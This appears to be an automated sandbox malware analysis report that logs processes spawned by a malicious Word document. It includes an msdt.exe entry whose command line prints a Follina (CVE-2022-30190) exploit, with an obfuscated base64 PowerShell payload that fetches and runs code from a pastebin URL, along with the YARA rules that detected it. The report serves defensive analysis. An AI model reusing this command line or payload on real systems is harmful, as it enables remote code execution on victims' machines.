                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                      Start time:08:34:39
                                                                                                                                                                                                      Start date:18/08/2022
                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                                                      Imagebase:0x1130000
                                                                                                                                                                                                      File size:1937688 bytes
                                                                                                                                                                                                      MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                      Start time:08:34:46
                                                                                                                                                                                                      Start date:18/08/2022
                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                                                      Imagebase:0xee0000
                                                                                                                                                                                                      File size:466688 bytes
                                                                                                                                                                                                      MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                      Start time:08:35:00
                                                                                                                                                                                                      Start date:18/08/2022
                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(iex($(iex('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4KCdpZXgoezB9IHBhc3RlYmluezF9Y29tezJ9cmF3ezJ9ZkdnQnk2SEcpJy1mJ2lybScsJy4nLCcvJyk='+[char]34+'))'))))i../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
                                                                                                                                                                                                      Imagebase:0x1100000
                                                                                                                                                                                                      File size:1508352 bytes
                                                                                                                                                                                                      MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000005.00000002.618908929.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000005.00000002.618908929.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000005.00000002.619006579.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000005.00000002.625957459.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000005.00000002.625957459.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000005.00000002.618774388.0000000001060000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000005.00000002.618774388.0000000001060000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                      Start time:08:35:53
                                                                                                                                                                                                      Start date:18/08/2022
                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uhgycnj1\uhgycnj1.cmdline
                                                                                                                                                                                                      Imagebase:0x1390000
                                                                                                                                                                                                      File size:2170976 bytes
                                                                                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                      Start time:08:35:55
                                                                                                                                                                                                      Start date:18/08/2022
                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67B5.tmp" "c:\Users\user\AppData\Local\Temp\uhgycnj1\CSC5D456D749058409DBC18DA207571A96.TMP"
                                                                                                                                                                                                      Imagebase:0x1010000
                                                                                                                                                                                                      File size:43176 bytes
                                                                                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                      Start time:08:35:59
                                                                                                                                                                                                      Start date:18/08/2022
                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cywbhpso\cywbhpso.cmdline
                                                                                                                                                                                                      Imagebase:0x1390000
                                                                                                                                                                                                      File size:2170976 bytes
                                                                                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                      Start time:08:36:01
                                                                                                                                                                                                      Start date:18/08/2022
                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7E0C.tmp" "c:\Users\user\AppData\Local\Temp\cywbhpso\CSC70696B0C2A9C4BEF892E83C3155548A4.TMP"
                                                                                                                                                                                                      Imagebase:0x1010000
                                                                                                                                                                                                      File size:43176 bytes
                                                                                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                      Start time:08:36:40
                                                                                                                                                                                                      Start date:18/08/2022
                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\md5akkd2\md5akkd2.cmdline
                                                                                                                                                                                                      Imagebase:0x1390000
                                                                                                                                                                                                      File size:2170976 bytes
                                                                                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                      Start time:08:36:42
                                                                                                                                                                                                      Start date:18/08/2022
                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2066.tmp" "c:\Users\user\AppData\Local\Temp\md5akkd2\CSC5A96336FDD91418583C44D4183EDFF63.TMP"
                                                                                                                                                                                                      Imagebase:0x1010000
                                                                                                                                                                                                      File size:43176 bytes
                                                                                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                      No disassembly